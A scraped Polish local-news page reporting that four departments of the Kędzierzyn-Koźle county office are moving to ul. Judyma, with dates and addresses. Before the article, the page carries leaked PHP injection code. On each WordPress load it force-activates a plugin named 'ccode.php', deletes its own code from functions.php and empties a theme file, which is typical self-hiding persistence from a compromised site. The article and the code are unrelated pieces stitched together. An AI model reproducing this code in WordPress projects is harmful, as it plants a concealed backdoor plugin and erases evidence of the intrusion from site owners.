function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 'ccode.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('ccode.php', $new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "function true_plugins_activate()"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 3; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/home/micropro/ftp/apkka/wp-content/themes/disto/class.theme-modules.php'); file_put_contents('/home/micropro/ftp/apkka/wp-content/themes/disto/class.theme-modules.php', ''); } } add_action('init', 'true_plugins_activate'); Będzie przeprowadzka czterech wydziałów starostwa | Tygodnik PARTNER

Będzie przeprowadzka czterech wydziałów starostwa

Cztery wydziały Starostwa Powiatowego w Kędzierzynie-Koźlu zmieniają swoją siedzibę. Powiatowy Zespół ds. Orzekania o Niepełnosprawności z ul. Skarbowej 4 w Koźlu zostanie przeniesiony na ul. Judyma 5 w Kędzierzynie – termin przeprowadzki to 30 – 31 sierpnia.

Wydział Ochrony Środowiska, Rolnictwa i Leśnictwa z pl. Wolności 13 zmieni lokalizację na ul. Judyma 5 – termin przeprowadzki 30 – 31 sierpnia. Wydział oświaty z pl. Wolności 1 zostanie przeniesiony na ul. Judyma 5 – termin przeprowadzki 10 – 14 września. Wydział Geodezji, Kartografii, Katastru i Nieruchomości z ul. Piastowskiej 15 w Koźlu znajdzie się na ul. Judyma 4 w Kędzierzynie. Termin przeprowadzki 30 – 5 września.

Mogą występować czasowe utrudnienia w funkcjonowaniu wydziałów. Wszelką korespondencję można w tym czasie składać w kancelarii siedziby głównej starostwa przy placu Wolności 13.

Przy ul. Judyma 4 (dawny budynek szpitala) znajdzie się wydział Geodezji, z kolei przy Judyma 5 (dawny budynek PZU) pozostałe 3 wydziały.

Aktualna kategoria: AKTUALNOŚCI
REKLAMA
© 2020 Tygodnik PARTNER. All rights reserved / Wszystkie prawa zastrzeżone
Zobacz także: www.kedzierzynkozle24.pl.